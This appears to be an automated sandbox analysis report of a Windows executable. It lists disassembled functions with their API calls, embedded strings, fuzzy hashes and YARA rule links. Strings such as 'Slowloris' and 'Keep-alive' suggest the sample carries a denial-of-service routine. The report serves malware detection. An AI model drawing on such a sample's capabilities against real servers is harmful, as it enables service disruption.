Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057EBC5
__CxxThrowException@8.LIBVCRUNTIME ref: 0057EBFC
std::_Facet_Register.LIBCPMT ref: 0057EC1B
std::_Lockit::~_Lockit.LIBCPMT ref: 0057EC24

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 3b19a988663a8b7bf9e3a869359cb3ebcfe2a185986c089b2d17d05b20847ae5
Instruction ID: 5538039f3f819057d4454404a54a9993722439d4c10eed927dd9db40ee9c45e6
Opcode Fuzzy Hash: 3b19a988663a8b7bf9e3a869359cb3ebcfe2a185986c089b2d17d05b20847ae5
Instruction Fuzzy Hash: A501E535D0011A9BCF01FBA0DC56ABD7B3ABF84350F54451EE5096B291DF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 0057EC31, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057EC38
std::_Lockit::_Lockit.LIBCPMT ref: 0057EC42

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057EC62
__CxxThrowException@8.LIBVCRUNTIME ref: 0057EC99
std::_Facet_Register.LIBCPMT ref: 0057ECB8
std::_Lockit::~_Lockit.LIBCPMT ref: 0057ECC1

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: e1fc1148259e84725b662776fa50010f974a2b1348c786174a22841775387923
Instruction ID: 438c5a5b9d52ca99d96f91b11f069ed544e0b3f32f79223ef191d4c52e0bf1b5
Opcode Fuzzy Hash: e1fc1148259e84725b662776fa50010f974a2b1348c786174a22841775387923
Instruction Fuzzy Hash: FD01A535D0011A9BCF02FB60D80AAED7B7ABF94750F54815EE5056B2E1DF389D019794

Uniqueness

Uniqueness Score: -1.00%

Function 0057ECCE, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0057ECD5
std::_Lockit::_Lockit.LIBCPMT ref: 0057ECDF

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0057ECFF
__CxxThrowException@8.LIBVCRUNTIME ref: 0057ED36
std::_Facet_Register.LIBCPMT ref: 0057ED55
std::_Lockit::~_Lockit.LIBCPMT ref: 0057ED5E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 80d351e08b7d009983d9aebac215592453e823de15c94ca6b9d4b81f7b048975
Instruction ID: 23057464108a21b1986c394ea9b1de5068b8f13cf3a1575239681e422eacbba2
Opcode Fuzzy Hash: 80d351e08b7d009983d9aebac215592453e823de15c94ca6b9d4b81f7b048975
Instruction Fuzzy Hash: 4701C432E0021A9BCF11FB60D816AFD7B76BF94720F54855EE5086B2A1DF389D029794

Uniqueness

Uniqueness Score: -1.00%

Function 0058B187, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058B18E
std::_Lockit::_Lockit.LIBCPMT ref: 0058B198

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0058B1B8
__CxxThrowException@8.LIBVCRUNTIME ref: 0058B1EF
std::_Facet_Register.LIBCPMT ref: 0058B20E
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B217

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 055d229ca270b1f202f288c122233c5deac05fa1af429e674812578e8c164ce0
Instruction ID: da8d3501645419f198c199d2839c52c647463e888eeb860a64112cda8cdc6255
Opcode Fuzzy Hash: 055d229ca270b1f202f288c122233c5deac05fa1af429e674812578e8c164ce0
Instruction Fuzzy Hash: CC01E531E0011A9BDF01FBA0D85AABD773ABF80320F54450EE5157B291DF389D02C794

Uniqueness

Uniqueness Score: -1.00%

Function 0058B224, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058B22B
std::_Lockit::_Lockit.LIBCPMT ref: 0058B235

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0058B255
__CxxThrowException@8.LIBVCRUNTIME ref: 0058B28C
std::_Facet_Register.LIBCPMT ref: 0058B2AB
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B2B4

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 721bd2ed4d96796c16ef2c6b65eef4e19368d7c39b94cfea8259c95e8247633b
Instruction ID: a3513e0cf8958189b1875b86f108878d2215263c6c724b992b13ea9760ab36e8
Opcode Fuzzy Hash: 721bd2ed4d96796c16ef2c6b65eef4e19368d7c39b94cfea8259c95e8247633b
Instruction Fuzzy Hash: 7301C435E0011A9BDF01FBA0D859AFD7B7ABF80720F94821EE9157B291DF389D028794

Uniqueness

Uniqueness Score: -1.00%

Function 0058B3FB, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058B402
std::_Lockit::_Lockit.LIBCPMT ref: 0058B40C

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 0058B42C
__CxxThrowException@8.LIBVCRUNTIME ref: 0058B463
std::_Facet_Register.LIBCPMT ref: 0058B482
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B48B

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 969b0106ba72bc7098eb283045e99140dcae88840621d284b77f6cdd2fab9369
Instruction ID: 56fba4920423b387ea6c1808c15e06b455224c2b603599a5e6b6d58965df7aba
Opcode Fuzzy Hash: 969b0106ba72bc7098eb283045e99140dcae88840621d284b77f6cdd2fab9369
Instruction Fuzzy Hash: 7A01C431E0011A9BDF01FBA0D846ABD7B7ABF94760F94451EF9147B2A2DF389D028794

Uniqueness

Uniqueness Score: -1.00%

Function 00424E50, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00424E55

Part of subcall function 00415DA9: WSASocketW.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00415DBC

htonl.WS2_32(7F000001), ref: 00424EEF
htonl.WS2_32(00000000), ref: 00424F46
htonl.WS2_32(7F000001), ref: 00424F52

Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473

Strings

socket_select_interrupter, xrefs: 00424E95, 00424F11, 00424F37, 00424F68, 00424F98, 00424FBD, 00425023, 00425055, 004250A7

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: htonl$H_prolog$Socket
String ID: socket_select_interrupter
API String ID: 2867122483-3103927870
Opcode ID: 4ee220a8e187ea9021f244b93afb70d0d4cd753063b17ca334cb0f285d9c7772
Instruction ID: d8932cf7951f55d5c6c2f4ea399c89b8893e0b59eaea3f882a9e05c1fff9c1a0
Opcode Fuzzy Hash: 4ee220a8e187ea9021f244b93afb70d0d4cd753063b17ca334cb0f285d9c7772
Instruction Fuzzy Hash: B291F771E01208ABDF14DBA5E941BEEB7B9DF84324F20422BF521A72C1EB785E458B54

Uniqueness

Uniqueness Score: -1.00%

Function 00419C3D, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00419C41

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 00419C4C

Part of subcall function 00414332: std::_Throw_Cpp_error.LIBCPMT ref: 0041433D

Strings

<, xrefs: 00419CD1
_<, xrefs: 00419CEF
_<, xrefs: 00419E21, 00419ED0, 00419E24

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Cpp_errorExceptionException@8H_prologRaiseThrowThrow_std::_
String ID: <$_<$_<
API String ID: 2912727603-1681116392
Opcode ID: 98453329db2e686c1b4a2aa62216cdac7a3aa583c9c574a8a5e63d8be6481ccc
Instruction ID: 150cf6062b6b4b974066e9df20dccb097f65b60a0c1ed05d823ba1971c1ea4c6
Opcode Fuzzy Hash: 98453329db2e686c1b4a2aa62216cdac7a3aa583c9c574a8a5e63d8be6481ccc
Instruction Fuzzy Hash: 0C81B17190024CAADB04DFE9D851BEDBBB8AF14304F20826FF515A71A1DB781E85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004291BB, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 215COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004291BF

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 004291CA

Strings

W;\, xrefs: 004292E5, 004293CB

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8H_prologRaiseThrow
String ID: W;\
API String ID: 1681477883-3369931712
Opcode ID: 9d355a18ded2d43fa1c5ea3dc20a2c495681ebf179de5de55d24970d36719f34
Instruction ID: 762b2b96d21b1a5a65d5c130f2bb551cb97727d37462daceea88c11a0b5ac995
Opcode Fuzzy Hash: 9d355a18ded2d43fa1c5ea3dc20a2c495681ebf179de5de55d24970d36719f34
Instruction Fuzzy Hash: 9681BF70900108AFDB18EFE5D985AFEBBB8EF44304F10856EF151A7291DB785E46CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041A254, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0041A258

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 0041A263

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Strings

Slowloris, xrefs: 0041A33D
V, xrefs: 0041A2E5
`, xrefs: 0041A2DE

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateExceptionException@8H_prologRaiseThrowstd::_
String ID: Slowloris$V$`
API String ID: 2218394418-3809275670
Opcode ID: 48f07bd859b983c0772031ec7131ae3d2e24da92e5cd9d8507a210bc33cfcdeb
Instruction ID: 456a2efcc7df4aac0332b5f5e7fd2908ba31bd5b6d614b574298451caae9b6a3
Opcode Fuzzy Hash: 48f07bd859b983c0772031ec7131ae3d2e24da92e5cd9d8507a210bc33cfcdeb
Instruction Fuzzy Hash: 4D71A07194024CAEDB14EFE5D851BEEBBB8EF14304F10422FF505A7291DBB81A85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041A510, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0041A514

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 0041A51F

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Strings

%, xrefs: 0041A59D
', xrefs: 0041A5A4
Keep-alive, xrefs: 0041A5FC

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateExceptionException@8H_prologRaiseThrowstd::_
String ID: %$'$Keep-alive
API String ID: 2218394418-3635510749
Opcode ID: d734a8e786c9c692c1cb85c859ec5ce1947c3b0460bbffb7b46127c708def64d
Instruction ID: c6d47d4c4639933ad259d32ef3d8376bf90d0b726f61928fb68829b040a4d496
Opcode Fuzzy Hash: d734a8e786c9c692c1cb85c859ec5ce1947c3b0460bbffb7b46127c708def64d
Instruction Fuzzy Hash: DE71B17190124CEEDB14EFE9D841BEEBBB8AF04304F10422FF505A7291DBB85A85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0051ED0B, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0051ED10

Strings

cv::setSize, xrefs: 0051EE42, 0051EEA1, 0051EF20
s >= 0, xrefs: 0051EEB2
0 <= _dims && _dims <= CV_MAX_DIM, xrefs: 0051EF31
The total matrix size does not fit to "size_t" type, xrefs: 0051EE53

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 0 <= _dims && _dims <= CV_MAX_DIM$The total matrix size does not fit to "size_t" type$cv::setSize$s >= 0
API String ID: 3519838083-1770251609
Opcode ID: 0b122555798ba238e0b0ba7f964afbbb499c51886e38249b71316d60e133c200
Instruction ID: e5662c2855b2d35897ba5f07421cd54dad025f4d97eeb561509d93a3b6e65b7f
Opcode Fuzzy Hash: 0b122555798ba238e0b0ba7f964afbbb499c51886e38249b71316d60e133c200
Instruction Fuzzy Hash: 9471F371900309DFEB24DFA4C986BEDBBB5FF54304F14822EE50697291EB74AA85CB40

Uniqueness

Uniqueness Score: -1.00%

Function 004AEE84, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AEE89
std::exception::exception.LIBCONCRT ref: 004AEFC9
__CxxThrowException@8.LIBVCRUNTIME ref: 004AEFF7

Part of subcall function 004B15E8: __EH_prolog.LIBCMT ref: 004B15ED
Part of subcall function 004B15E8: std::exception::exception.LIBCONCRT ref: 004B163C
Part of subcall function 004B15E8: __CxxThrowException@8.LIBVCRUNTIME ref: 004B166A
Part of subcall function 004B15E8: std::exception::exception.LIBCONCRT ref: 004B16A0

Strings

]sB, xrefs: 004AEFE0
unexpected end of data, xrefs: 004AEFBF

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::exception::exception$Exception@8H_prologThrow
String ID: ]sB$unexpected end of data
API String ID: 1448338827-1396046059
Opcode ID: 5f6286e1f07a237205790ef9dc93b93effe03d2978dd5b2eaf1bfcc9e078fce0
Instruction ID: 47a25c688b2a28ef1afddb55dfa09fbaff01b6c35706859163b677aa32b1874c
Opcode Fuzzy Hash: 5f6286e1f07a237205790ef9dc93b93effe03d2978dd5b2eaf1bfcc9e078fce0
Instruction Fuzzy Hash: A04194B08051856DDB219B6684047A6FFA5EB37318F4882ABE5E44B343C37C89C6D75E

Uniqueness

Uniqueness Score: -1.00%

Function 004BA59D, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004BA5A2
std::exception::exception.LIBCONCRT ref: 004BA72B
__CxxThrowException@8.LIBVCRUNTIME ref: 004BA759

Strings

expected ;, xrefs: 004BA723
]sB, xrefs: 004BA742

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8H_prologThrowstd::exception::exception
String ID: ]sB$expected ;
API String ID: 1340123063-1083820522
Opcode ID: b550e0ab08222f7f77c92f204dcfa7b6444fc61e9ff65dad27dd98a2204f7691
Instruction ID: 7348b9a7ba372f27c5bcf0f6294cf0445a7fb8f2a83b3670ac1012c88edf89bf
Opcode Fuzzy Hash: b550e0ab08222f7f77c92f204dcfa7b6444fc61e9ff65dad27dd98a2204f7691
Instruction Fuzzy Hash: 7741F5A0C482C449EB358B2884157FABFF14B16304F5C809FD0C553742C36E4D96A7AB

Uniqueness

Uniqueness Score: -1.00%

Function 0051E5BE, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0051E5C3
_strlen.LIBCMT ref: 0051E5EC
_strlen.LIBCMT ref: 0051E5F9

Strings

module != 0 && module->name != 0 && module->version != 0, xrefs: 0051E6A6
cvRegisterModule, xrefs: 0051E695

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$H_prolog
String ID: cvRegisterModule$module != 0 && module->name != 0 && module->version != 0
API String ID: 1011152186-743800567
Opcode ID: b6ecbd2e245c52d87adcc449686f96ba77382eeaee26d8779ad188d4c4c1b856
Instruction ID: 7ba626a401bceaca904931e49201bae3fb8da8dff47e98529f55d73be2fbcfda
Opcode Fuzzy Hash: b6ecbd2e245c52d87adcc449686f96ba77382eeaee26d8779ad188d4c4c1b856
Instruction Fuzzy Hash: 2E3127B29002089FEB19DFA8DC51BEEBBF5EB14300F10812EE802D7552E7789985CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00422FF0, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00579A51: __CxxThrowException@8.LIBVCRUNTIME ref: 00579A6B

Part of subcall function 00579A91: __CxxThrowException@8.LIBVCRUNTIME ref: 00579AAB
Part of subcall function 00579A91: std::regex_error::regex_error.LIBCPMT ref: 00579ABD
Part of subcall function 00579A91: __CxxThrowException@8.LIBVCRUNTIME ref: 00579ACB

__EH_prolog.LIBCMT ref: 004230AB

Part of subcall function 004AA205: __EH_prolog.LIBCMT ref: 004AA20A

Strings

stoll argument out of range, xrefs: 00423040
invalid stoull argument, xrefs: 00423091
invalid stoll argument, xrefs: 00423036
stoull argument out of range, xrefs: 0042309B

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8Throw$H_prolog$std::regex_error::regex_error
String ID: invalid stoll argument$invalid stoull argument$stoll argument out of range$stoull argument out of range
API String ID: 3593521065-1946835417
Opcode ID: b3e2169955527ab97564677e75b59eec814bc091ef32460f4d80bf2d83d84926
Instruction ID: a639a4b0519d944d2ec1176c502853b24eec4b0607276e1371c091c7d5fd27a1
Opcode Fuzzy Hash: b3e2169955527ab97564677e75b59eec814bc091ef32460f4d80bf2d83d84926
Instruction Fuzzy Hash: B521E872B00214BFEB14AB44EC46BAEB36DEF42722F10016EF90457601DBB56E0087F5

Uniqueness

Uniqueness Score: -1.00%

Function 004AB7FD, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AB802

Part of subcall function 0041F0C9: __EH_prolog.LIBCMT ref: 0041F0CE

Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473

Strings

bind, xrefs: 004AB8B3
open, xrefs: 004AB857
set_option, xrefs: 004AB88C
listen, xrefs: 004AB8D1

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: bind$listen$open$set_option
API String ID: 3519838083-2803824588
Opcode ID: 96110595550c1bf6836e7edd7b21cf596fc4d0fa51295f212104c6c100576f34
Instruction ID: 60cc2f46af1f607ce8064f9bcdf563aed8e6c223ac46b477335333a4d71b1311
Opcode Fuzzy Hash: 96110595550c1bf6836e7edd7b21cf596fc4d0fa51295f212104c6c100576f34
Instruction Fuzzy Hash: E93177B1E00109AFDB14EF95D882AEEB7B9EF44714F10843EF514D7181E7749A85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0051E2A2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

__swprintf.LEGACY_STDIO_DEFINITIONS ref: 0051E33F
__CxxThrowException@8.LIBVCRUNTIME ref: 0051E397

Strings

OpenCV Error: %s (%s) in %s, file %s, line %d, xrefs: 0051E339
%s, xrefs: 0051E34E
unknown function, xrefs: 0051E311, 0051E330

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8Throw__swprintf
String ID: %s$OpenCV Error: %s (%s) in %s, file %s, line %d$unknown function
API String ID: 2877379683-3808662302
Opcode ID: 1195b3e9435ee1e54b1fdbb347e83357923a8c5ea6e45cbb834458bf77966364
Instruction ID: 24f399af4d63e0492ef292f94bb50414464faae7ceed8f4c11e01d7fe7cd6410
Opcode Fuzzy Hash: 1195b3e9435ee1e54b1fdbb347e83357923a8c5ea6e45cbb834458bf77966364
Instruction Fuzzy Hash: 7E31C4719006059FF728DB54DC0AEA67BBAFF45300B50095CE5528B5A2D7B1F9C1CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00425231, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00425236

Part of subcall function 00424E50: __EH_prolog.LIBCMT ref: 00424E55
Part of subcall function 00424E50: htonl.WS2_32(7F000001), ref: 00424EEF
Part of subcall function 00424E50: htonl.WS2_32(00000000), ref: 00424F46
Part of subcall function 00424E50: htonl.WS2_32(7F000001), ref: 00424F52

new.LIBCMT ref: 004252E7
new.LIBCMT ref: 004252FD

Part of subcall function 00680AF7: Concurrency::cancel_current_task.LIBCPMT ref: 00680B0F

Part of subcall function 00414AA6: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ABB
Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ACD
Part of subcall function 00414AA6: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B0F
Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B21
Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,?,?,?,?,?,00414E92,00000000), ref: 00414B86
Part of subcall function 00414AA6: CloseHandle.KERNEL32(00000000), ref: 00414B9C
Part of subcall function 00414AA6: CloseHandle.KERNEL32(00000000), ref: 00414BAA

Strings

IA, xrefs: 0042524A
NSB, xrefs: 0042526C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLasthtonl$CloseCreateEventH_prologHandle$Concurrency::cancel_current_task
String ID: NSB$IA
API String ID: 2183375162-1714093477
Opcode ID: 01b522865fb8efc7fd11dca09108f628bccdf3ed7ca3d8dc7e146f4f8549739f
Instruction ID: 97e3e356a5e110bbae6696401dea22d827379dba35d9c6740926647f0d94a568
Opcode Fuzzy Hash: 01b522865fb8efc7fd11dca09108f628bccdf3ed7ca3d8dc7e146f4f8549739f
Instruction Fuzzy Hash: CD31CFB0A01745EEE704DF69C545B89FFA4FF51304F10866EE058A7282C7B85A54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004ADC44, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004ADC49

Strings

m >= MemberBegin() && m < MemberEnd(), xrefs: 004ADCC2
GetMembersPointer() != 0, xrefs: 004ADC96
data_.o.size > 0, xrefs: 004ADC7D
IsObject(), xrefs: 004ADC65

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: GetMembersPointer() != 0$IsObject()$data_.o.size > 0$m >= MemberBegin() && m < MemberEnd()
API String ID: 3519838083-1829973892
Opcode ID: a4efb8ceb23170acd5b4d505f392eaffd195ebf5fb0999bca14a830b648f0f8a
Instruction ID: d85beb351cedf453b8bd51bfbf4da4e1c969620a48f7c75cc696a8d36cfde585
Opcode Fuzzy Hash: a4efb8ceb23170acd5b4d505f392eaffd195ebf5fb0999bca14a830b648f0f8a
Instruction Fuzzy Hash: 6E216BB2B00304A7EB20FF55DE82A6E735EEB61751F44053EF402436C2EB795E40C65A

Uniqueness

Uniqueness Score: -1.00%

Function 004AE76A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AE76F
__Getcvt.LIBCPMT ref: 004AE78D
std::_Locinfo::_Getcvt.LIBCPMT ref: 004AE7BD

Strings

true, xrefs: 004AE7E6
false, xrefs: 004AE7D4

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Getcvt$H_prologLocinfo::_std::_
String ID: false$true
API String ID: 312723928-2658103896
Opcode ID: a4beda2d7885d61b92a10bf084d814457cca9a3140c6259bc9f1c7002f2d155a
Instruction ID: 949ef4dcd0b6bce0b0ce459e9c8ea2392efabcb6970d87e3ab5fd425250f439c
Opcode Fuzzy Hash: a4beda2d7885d61b92a10bf084d814457cca9a3140c6259bc9f1c7002f2d155a
Instruction Fuzzy Hash: 2821B0B18003449FC721EFAAD841AAFBFF8EF56300F10852FE45597252D7349A05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004B1912, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B1917
std::exception::exception.LIBCONCRT ref: 004B197E

Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358

__CxxThrowException@8.LIBVCRUNTIME ref: 004B19AF

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

]sB, xrefs: 004B1998
unexpected end of data, xrefs: 004B1974

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8H_prologRaiseThrow___std_exception_copystd::exception::exception
String ID: ]sB$unexpected end of data
API String ID: 281195438-1396046059
Opcode ID: 46783c0619959fa227bf1ae2aa932e335c03a0ff92cdf43c7c96e04afb9f7fe5
Instruction ID: 68e6c3820bfac509b40b235c4f341d15e4176986f668f6679be1e79896c8ef80
Opcode Fuzzy Hash: 46783c0619959fa227bf1ae2aa932e335c03a0ff92cdf43c7c96e04afb9f7fe5
Instruction Fuzzy Hash: 6311EFB1C042459FDB24DF68C0297AAFBF9EF24314F14858ED491973A2C3B90A05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004B1890, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B1895
std::exception::exception.LIBCONCRT ref: 004B18DE

Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358

__CxxThrowException@8.LIBVCRUNTIME ref: 004B190C

